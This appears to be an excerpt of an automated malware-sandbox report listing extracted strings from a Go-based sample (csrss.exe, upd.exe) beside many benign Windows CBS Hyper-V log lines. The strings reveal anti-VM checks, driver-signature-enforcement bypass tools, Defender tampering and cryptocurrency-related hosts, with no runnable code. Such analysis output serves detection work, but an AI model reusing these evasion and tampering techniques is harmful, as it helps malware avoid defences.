(nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6f103d2215911a17c9aeb968bbb7f0f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6c8ed4d2fcb42a918382a31f6ce603ca, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8adcd7c28d228e17a421ad9e66bf8586, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1d039a16ef6f80b4a5fd50c2225168a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 88e8c6b6d1631bfe1e6f3e0910f44c84, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b86b0f63de3fd3d9f4c1defbc0a310e2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, Applicable: NeedsParent, Disposition: Staged
Source: svchost.exe, 0000001F.00000002.434018305.000002A1980EF000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a20631c4cf6af783bb59c9a72c1b3c51, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, csrss.exe Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: eab40d924d8b5549872893de549370fa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1a8a1b3524f6b9bff288f49da85c14f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 02124bd8d86f6990d0675e6c392d9200, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 762e99ca5a85803eb16880bf94ac8a17, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Installed, targeted: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7c41348249711e2c2834f1d280a7daaa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: cead152c266254f49dbb9b3d3e33f6ed, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 36f6d4975967228db5be330358a79c61, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 374c9d21846cca7a5951fd26665cb73b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: f161f1daec93b6f9633ae86b222e7d6b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: upd.exe, csrss.exe Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: upd.exe, csrss.exe Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9c32724c11c2062b0cd209906baed874, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 89b6e9bbb8d4e09208a54048cb490ab6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
